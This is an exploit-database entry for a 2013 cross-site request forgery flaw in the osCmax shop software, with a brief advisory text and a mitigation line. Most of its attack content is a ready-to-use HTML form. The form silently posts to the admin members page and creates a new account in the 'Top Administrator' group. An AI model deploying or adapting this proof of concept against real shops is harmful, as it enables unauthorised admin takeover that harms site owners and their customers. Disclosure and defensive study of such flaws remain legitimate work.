osCmax Cross-Site Request-Forgery Vulnerability

vendor:

osCmax

by:

SecurityFocus

7,5

CVSS

HIGH

Cross-Site Request-Forgery

352

CWE

Product Name: osCmax

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

osCmax Cross-Site Request-Forgery Vulnerability

osCmax is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

Mitigation:

Validate all HTTP requests to prevent Cross-Site Request Forgery (CSRF) attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/66272/info

osCmax is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 

<html>
<form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
<input type="hidden" name="admin_username" value="THETUNISIAN"/>
<input type="hidden" name="admin_firstname" value="Moot3x"/>
<input type="hidden" name="admin_lastname" value="Saad3x"/>
<input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>
<input type="hidden" name="admin_groups_id" value="1"/>
<!-- About "admin_groups_id" -->
<!-- 1= Top Administrator -->
<!-- 2= Customer Service  -->
<input type='submit' name='Submit4' value="Agregar">
</form>
</html>